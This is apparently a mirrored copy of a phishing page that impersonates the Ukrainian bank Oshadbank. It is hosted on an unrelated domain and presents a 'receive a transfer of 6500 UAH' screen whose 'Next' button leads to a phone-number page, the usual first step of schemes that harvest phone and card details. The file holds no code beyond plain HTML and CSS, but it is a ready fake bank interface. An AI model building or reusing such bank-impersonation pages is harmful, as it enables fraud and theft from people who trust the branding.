<!DOCTYPE html>
<html>

<!-- Mirrored from oshadbank.vviplta.cx.ua/oshadbank/recieve/8121154334 by HTTrack Website Copier/3.x [XR&CO'2017], Sat, 03 Jun 2023 18:51:04 GMT -->
<!-- Added by HTTrack -->
<meta http-equiv="content-type" content="text/html;charset=utf-8" />
<!-- /Added by HTTrack -->
<head>
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
  <link rel="icon" type="image/png" href="logo_oshadbank.png">
  <title>Oshadbank</title>
  <style>
    body {
      background-image: linear-gradient(-3deg, #f2f5fa 80%, #fdf01f 83%, #26cfc7 10%);
    }

    .logo {
      height: 55px;
      width: 55px;
      background: url('logo_oshadbank.png') no-repeat center;
    }

    .logo-page {
      width: 65px;
      height: 65px;
    }

    .button {
      color: #fff;
      border-radius: 4px;
      background-color: #26cfc7;
    }

    .bar {
      border: 2px solid #26cfc7;
    }

    .bar::before {
      background-color: #26cfc7;
    }
  </style>
  <link rel="stylesheet" type="text/css" href="style.css">
</head>

<body>
  <div class="container">
    <div class="content">
      <div class="image-container">
        <img class="image-page" src="money.png">
      </div>
      <div class="text">Отримання переказу</div>
      <div class="amount">6500 грн.</div>
    </div>
    <form action="phone.html" method="post">
      <button class="button" type="submit">Далi</button>
    </form>
  </div>
</body>

</html>
